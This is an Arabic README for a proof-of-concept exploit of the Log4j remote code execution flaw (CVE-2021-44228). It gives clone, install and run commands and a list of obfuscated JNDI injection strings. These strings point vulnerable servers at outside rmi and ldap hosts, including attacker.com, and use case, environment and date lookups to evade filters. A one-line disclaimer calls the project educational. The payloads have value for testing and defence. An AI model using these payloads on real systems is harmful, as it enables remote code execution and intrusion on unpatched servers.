
هذا استغلال لإثبات المفهوم لثغرة Log4j RCE غير المصادق عليها (CVE-2021-44228).
هذا هو استغلال إثبات المفهوم (Proof-of-Concept) لثغرة Log4j RCE بدون مصادقة (CVE-2021-44228).
تؤثّر هذه الثغرة على الإصدارات الأقدم من 2.15.0.
لمزيد من المعلومات:
https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
أُنشئ هذا المشروع لأغراض تعليمية فقط ولا يجوز استخدامه لانتهاك القانون أو لتحقيق مكاسب شخصية.
مؤلف هذا المشروع غير مسؤول عن أي ضرر محتمل ناجم عن مواد هذا المشروع.

git clone https://github.com/pedrohavay/exploit-CVE-2021-44228
cd exploit-CVE-2021-44228
pip install -r requirements.txt
استخدم السكربت
python3 main.py
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}